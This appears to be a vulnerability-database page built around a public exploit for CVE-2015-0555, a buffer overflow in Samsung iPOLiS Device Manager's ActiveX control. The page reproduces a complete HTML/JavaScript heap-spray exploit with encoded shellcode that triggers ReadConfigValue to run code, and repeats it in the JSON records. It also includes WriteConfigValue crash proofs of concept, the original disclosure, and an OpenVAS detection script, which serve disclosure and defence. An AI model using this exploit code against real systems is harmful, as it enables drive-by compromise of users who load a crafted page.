Search...

Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution

2015-04-15T00:00:00

ID PACKETSTORM:131421
Type packetstorm
Reporter Praveen Darshanam
Modified 2015-04-15T00:00:00

Description

                                        
                                            `&lt;html&gt;  
&lt;!--  
Vendor Homepage: https://www.samsung-security.com/Tools/device-manager.aspx  
Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (heap spray)  
CVE: 2015-0555  
Author: Praveen Darshanam  
http://blog.disects.com/2015/02/samsung-ipolis-1122-xnssdkdeviceipinsta.html  
http://darshanams.blogspot.com/  
Tested on Windows XP SP3 IE6/7  
Thanks to Peter Van Eeckhoutte for his wonderfull exploit writing tutorials  
--&gt;  
&lt;object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'&gt; &lt;/object&gt;  
&lt;script&gt;  
  
var shellcode = unescape('%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100');  
var bigblock = unescape('%u9090%u9090');  
var headersize = 20;  
var slackspace = headersize + shellcode.length;  
while (bigblock.length &lt; slackspace) bigblock += bigblock;  
  
var fillblock = bigblock.substring(0,slackspace);  
var block = bigblock.substring(0,bigblock.length - slackspace);  
while (block.length + slackspace &lt; 0x40000) block = block + block + fillblock;  
  
var memory = new Array();  
for (i = 0; i &lt; 500; i++){ memory[i] = block + shellcode }  
  
// SEH and nSEH will point to 0x06060606  
// 0x06060606 will point to (nops+shellcode) chunk  
var hbuff = "";  
for (i = 0; i &lt;5000; i++)  
{  
hbuff += "\x06";  
}  
  
// trigget crash  
target.ReadConfigValue(hbuff);  
&lt;/script&gt;  
&lt;/html&gt;  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:131421", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution", "description": "", "published": "2015-04-15T00:00:00", "modified": "2015-04-15T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 6.8}, "href": "https://packetstormsecurity.com/files/131421/Samsung-iPOLiS-1.12.2-ReadConfigValue-Remote-Code-Execution.html", "reporter": "Praveen Darshanam", "references": [], "cvelist": ["CVE-2015-0555"], "lastseen": "2016-12-05T22:22:05", "viewCount": 7, "enchantments": {"score": {"value": 8.5, "vector": "NONE", "modified": "2016-12-05T22:22:05", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-0555"]}, {"type": "saint", "idList": ["SAINT:C293293AA8A4A3ABA952B2F8AD3F6E4F", "SAINT:52D04D116E353FDEFF3E2508EB55C015", "SAINT:1CA2F930ECF8743D8B82A77AFDF9B1B6"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:83CB1F53F68852B5CFE5322CADF30B14"]}, {"type": "exploitdb", "idList": ["EDB-ID:36152", "EDB-ID:36756"]}, {"type": "zdt", "idList": ["1337DAY-ID-23317"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805482"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:130478"]}], "modified": "2016-12-05T22:22:05", "rev": 2}, "vulnersScore": 8.5}, "sourceHref": "https://packetstormsecurity.com/files/download/131421/samsungipolis-exec.txt", "sourceData": "`<html> \n \n<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object> \n<script> \n \nvar shellcode = unescape('%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100'); \nvar bigblock = unescape('%u9090%u9090'); \nvar headersize = 20; \nvar slackspace = headersize + shellcode.length; \nwhile (bigblock.length < slackspace) bigblock += bigblock; \n \nvar fillblock = bigblock.substring(0,slackspace); \nvar block = bigblock.substring(0,bigblock.length - slackspace); \nwhile (block.length + slackspace < 0x40000) block = block + block + fillblock; \n \nvar memory = new Array(); \nfor (i = 0; i < 500; i++){ memory[i] = block + shellcode } \n \n// SEH and nSEH will point to 0x06060606 \n// 0x06060606 will point to (nops+shellcode) chunk \nvar hbuff = \"\"; \nfor (i = 0; i <5000; i++) \n{ \nhbuff += \"\\x06\"; \n} \n \n// trigget crash \ntarget.ReadConfigValue(hbuff); \n</script> \n</html> \n \n`\n", "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T06:21:20", "description": "Buffer overflow in the XnsSdkDeviceIpInstaller.ocx ActiveX control in Samsung iPOLiS Device Manager 1.12.2 allows remote attackers to execute arbitrary code via a long string in the first argument to the (1) ReadConfigValue or (2) WriteConfigValue function.", "edition": 4, "cvss3": {}, "published": "2015-02-24T15:59:00", "title": "CVE-2015-0555", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0555"], "modified": "2016-04-01T01:05:00", "cpe": ["cpe:/a:samsung:ipolis_device_manager:1.12.2"], "id": "CVE-2015-0555", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0555", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:samsung:ipolis_device_manager:1.12.2:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-01-09T01:03:48", "edition": 2, "description": "Exploit for windows platform in category dos / poc", "published": "2015-02-23T00:00:00", "type": "zdt", "title": "Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555"], "modified": "2015-02-23T00:00:00", "id": "1337DAY-ID-23317", "href": "https://0day.today/exploit/description/23317", "sourceData": "\r\n \r\n<html>\r\n\r\n<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>\r\n<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>\r\n<script>\r\nvar arg1 = \"\";\r\nvar arg2=\"praveend\";\r\n \r\nfor (i=0; i<= 15000; i++)\r\n{\r\n arg1 += \"A\";\r\n}\r\n \r\ntarget.WriteConfigValue(arg1 ,arg2);\r\n \r\n</script>\r\n</html>\r\n \r\n\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/23317"}], "saint": [{"lastseen": "2019-05-29T19:19:28", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555"], "edition": 2, "description": "Added: 04/27/2015 \nCVE: [CVE-2015-0555](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0555>) \nOSVDB: [118668](<http://www.osvdb.org/118668>) \n\n\n### Background\n\n[Samsung iPOLiS Device Manager](<https://www.samsung-security.com/Tools/device-manager.aspx>) is software for managing network devices. It comes with an ActiveX control called `**XnsSdkDeviceIpInstaller.ocx**`. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ReadConfigValue**` and `**WriteConfigValue**` methods in the `**XnsSdkDeviceIpInstaller.ocx**` ActiveX control allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nThere is no known fix for this vulnerability. Remove the ActiveX control or avoid loading pages from untrusted sites. \n\n### References\n\n<http://seclists.org/fulldisclosure/2015/Feb/81> \n\n\n### Limitations\n\nExploit works on Windows XP SP3 with IE 6 and 7, and requires a user to load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2015-04-27T00:00:00", "published": "2015-04-27T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/samsung_ipolis_readconfigvalue", "id": "SAINT:52D04D116E353FDEFF3E2508EB55C015", "title": "Samsung iPOLiS Device Manager ReadConfigValue vulnerability", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555"], "description": "Added: 04/27/2015 \nCVE: [CVE-2015-0555](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0555>) \nOSVDB: [118668](<http://www.osvdb.org/118668>) \n\n\n### Background\n\n[Samsung iPOLiS Device Manager](<https://www.samsung-security.com/Tools/device-manager.aspx>) is software for managing network devices. It comes with an ActiveX control called `**XnsSdkDeviceIpInstaller.ocx**`. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ReadConfigValue**` and `**WriteConfigValue**` methods in the `**XnsSdkDeviceIpInstaller.ocx**` ActiveX control allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nThere is no known fix for this vulnerability. Remove the ActiveX control or avoid loading pages from untrusted sites. \n\n### References\n\n<http://seclists.org/fulldisclosure/2015/Feb/81> \n\n\n### Limitations\n\nExploit works on Windows XP SP3 with IE 6 and 7, and requires a user to load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2015-04-27T00:00:00", "published": "2015-04-27T00:00:00", "id": "SAINT:1CA2F930ECF8743D8B82A77AFDF9B1B6", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/samsung_ipolis_readconfigvalue", "title": "Samsung iPOLiS Device Manager ReadConfigValue vulnerability", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555"], "description": "Added: 04/27/2015 \nCVE: [CVE-2015-0555](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0555>) \nOSVDB: [118668](<http://www.osvdb.org/118668>) \n\n\n### Background\n\n[Samsung iPOLiS Device Manager](<https://www.samsung-security.com/Tools/device-manager.aspx>) is software for managing network devices. It comes with an ActiveX control called `**XnsSdkDeviceIpInstaller.ocx**`. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ReadConfigValue**` and `**WriteConfigValue**` methods in the `**XnsSdkDeviceIpInstaller.ocx**` ActiveX control allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nThere is no known fix for this vulnerability. Remove the ActiveX control or avoid loading pages from untrusted sites. \n\n### References\n\n<http://seclists.org/fulldisclosure/2015/Feb/81> \n\n\n### Limitations\n\nExploit works on Windows XP SP3 with IE 6 and 7, and requires a user to load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2015-04-27T00:00:00", "published": "2015-04-27T00:00:00", "id": "SAINT:C293293AA8A4A3ABA952B2F8AD3F6E4F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/samsung_ipolis_readconfigvalue", "type": "saint", "title": "Samsung iPOLiS Device Manager ReadConfigValue vulnerability", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-03-05T18:56:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0555"], "description": "This host is installed with Samsung iPOLiS\n Device Manager and is prone to buffer overflow vulnerability.", "modified": "2020-03-04T00:00:00", "published": "2015-03-20T00:00:00", "id": "OPENVAS:1361412562310805482", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805482", "type": "openvas", "title": "Samsung iPOLiS Device Manager Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Samsung iPOLiS Device Manager Buffer Overflow Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:samsung:ipolis_device_manager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805482\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2015-0555\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-03-20 15:38:22 +0530 (Fri, 20 Mar 2015)\");\n script_name(\"Samsung iPOLiS Device Manager Buffer Overflow Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Samsung iPOLiS\n Device Manager and is prone to buffer overflow vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to Buffer overflow in\n the XnsSdkDeviceIpInstaller.ocx ActiveX control in Samsung iPOLiS Device Manager.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a\n context-dependent attacker to execute arbitrary code or cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Samsung iPOLiS Device Manager version 1.12.2\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\n Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the\n product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2015/Feb/81\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_samsung_iPOLis_manager_detect.nasl\");\n script_mandatory_keys(\"Samsung/iPOLiS_Device_Manager/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!Ver = (get_app_version(cpe:CPE))){\n exit(0);\n}\n\nif(version_is_equal(version:Ver, test_version:\"1.12.2\"))\n{\n VULN = TRUE;\n fix = \"WillNotFix\";\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:Ver, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T02:51:47", "description": "Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC. CVE-2015-0555. Dos exploit for windows platform", "published": "2015-02-22T00:00:00", "type": "exploitdb", "title": "Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555"], "modified": "2015-02-22T00:00:00", "id": "EDB-ID:36152", "href": "https://www.exploit-db.com/exploits/36152/", "sourceData": "\r\n\r\n<html>\r\n\r\n<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>\r\n<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>\r\n<script>\r\nvar arg1 = \"\";\r\nvar arg2=\"praveend\";\r\n\r\nfor (i=0; i<= 15000; i++)\r\n{\r\n\targ1 += \"A\";\r\n}\r\n\r\ntarget.WriteConfigValue(arg1 ,arg2);\r\n\r\n</script>\r\n</html>\r\n\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/36152/"}, {"lastseen": "2016-02-04T04:15:54", "description": "Samsung iPOLiS ReadConfigValue Remote Code Execution. CVE-2015-0555. Remote exploit for windows platform", "published": "2015-04-14T00:00:00", "type": "exploitdb", "title": "Samsung iPOLiS ReadConfigValue Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555"], "modified": "2015-04-14T00:00:00", "id": "EDB-ID:36756", "href": "https://www.exploit-db.com/exploits/36756/", "sourceData": "<html>\r\n\r\n<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>\r\n<script>\r\n\r\nvar shellcode = unescape('%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100');\r\nvar bigblock = unescape('%u9090%u9090');\r\nvar headersize = 20;\r\nvar slackspace = headersize + shellcode.length;\r\nwhile (bigblock.length < slackspace) bigblock += bigblock;\r\n\r\nvar fillblock = bigblock.substring(0,slackspace);\r\nvar block = bigblock.substring(0,bigblock.length - slackspace);\r\nwhile (block.length + slackspace < 0x40000) block = block + block + fillblock;\r\n\r\nvar memory = new Array();\r\nfor (i = 0; i < 500; i++){ memory[i] = block + shellcode }\r\n\r\n// SEH and nSEH will point to 0x06060606\r\n// 0x06060606 will point to (nops+shellcode) chunk\r\nvar hbuff = \"\";\r\nfor (i = 0; i <5000; i++)\r\n{\r\n\thbuff += \"\\x06\";\r\n}\r\n\r\n// trigget crash\r\ntarget.ReadConfigValue(hbuff);\r\n</script>\r\n</html>", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/36756/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:47", "description": "\nSamsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)", "edition": 1, "published": "2015-02-22T00:00:00", "title": "Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555"], "modified": "2015-02-22T00:00:00", "id": "EXPLOITPACK:83CB1F53F68852B5CFE5322CADF30B14", "href": "", "sourceData": "\n\n<html>\n\n<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>\n<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>\n<script>\nvar arg1 = \"\";\nvar arg2=\"praveend\";\n\nfor (i=0; i<= 15000; i++)\n{\n\targ1 += \"A\";\n}\n\ntarget.WriteConfigValue(arg1 ,arg2);\n\n</script>\n</html>\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:05", "description": "", "published": "2015-02-21T00:00:00", "type": "packetstorm", "title": "Samsung iPolis Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555", "CVE-2014-3911"], "modified": "2015-02-21T00:00:00", "id": "PACKETSTORM:130478", "href": "https://packetstormsecurity.com/files/130478/Samsung-iPolis-Buffer-Overflow.html", "sourceData": "`CVE-2015-0555 \n \nIntroduction \n************************************************************* \n \nThere is a Buffer Overflow Vulnerability which leads to Remote Code \nExecution. \nVulnerability is due to input validation to the API ReadConfigValue and \nWriteConfigValue API's in XnsSdkDeviceIpInstaller.ocx \n \nThis is different from CVE-2014-3911 as the version of iPolis 1.12.2 \n(latest as of 12/12/2014). \nCVE-2014-3911 is related to different ActiveX and on older iPolis version \n \nDiscovery MEthod: Fuzzing \nExploiting: It is a client side attack where attacker can host a crafted \nHTML web page with malicious payload and entice the victim to browse to the \nhosted page to compromise the victim. \n \nOperating System: Windows 7 Ultimate N SP1 \n \n************************************************************* \nVulnerability1: \n*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution* \n******************Proof of Concept (PoC)**************8 \n</html> \n<head> Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue() \nRemote Code Execution</head> \n<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' /> \n<script language='vbscript'> \n \ntargetFile = \"C:\\Program Files\\Samsung\\iPOLiS Device \nManager\\XnsSdkDeviceIpInstaller.ocx\" \nprototype = \"Function ReadConfigValue ( ByVal szKey As String ) As String\" \nmemberName = \"ReadConfigValue\" \nprogid = \"XNSSDKDEVICELib.XnsSdkDevice\" \nargCount = 1 \n \narg1=String(1044, \"A\") \n \ntarget.ReadConfigValue arg1 \n \n</script> \n</html> \n \n \n***************************************************************************************** \n*Vulnerability2: * \n*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution \n* \n \n*******************Proof of Concept (PoC)********************* \n \n<html> \n<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' /> \n<script language='vbscript'> \n \ntargetFile = \"C:\\Program Files\\Samsung\\iPOLiS Device \nManager\\XnsSdkDeviceIpInstaller.ocx\" \nprototype = \"Function WriteConfigValue ( ByVal szKey As String , ByVal \nszValue As String ) As Long\" \nmemberName = \"WriteConfigValue\" \nprogid = \"XNSSDKDEVICELib.XnsSdkDevice\" \nargCount = 2 \n \narg1=String(14356, \"A\") \narg2=\"defaultV\" \n \ntarget.WriteConfigValue arg1 ,arg2 \n \n</script></job></package> \n</html> \n**************************************************************************** \n \nCERT contacted Samsung but there wasn't any response from Samsung. \nRefer http://blog.disects.com for more details \n \nBest Regards, \nPraveen Darshanam \n \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130478/samsungipolis-overflow.txt"}]}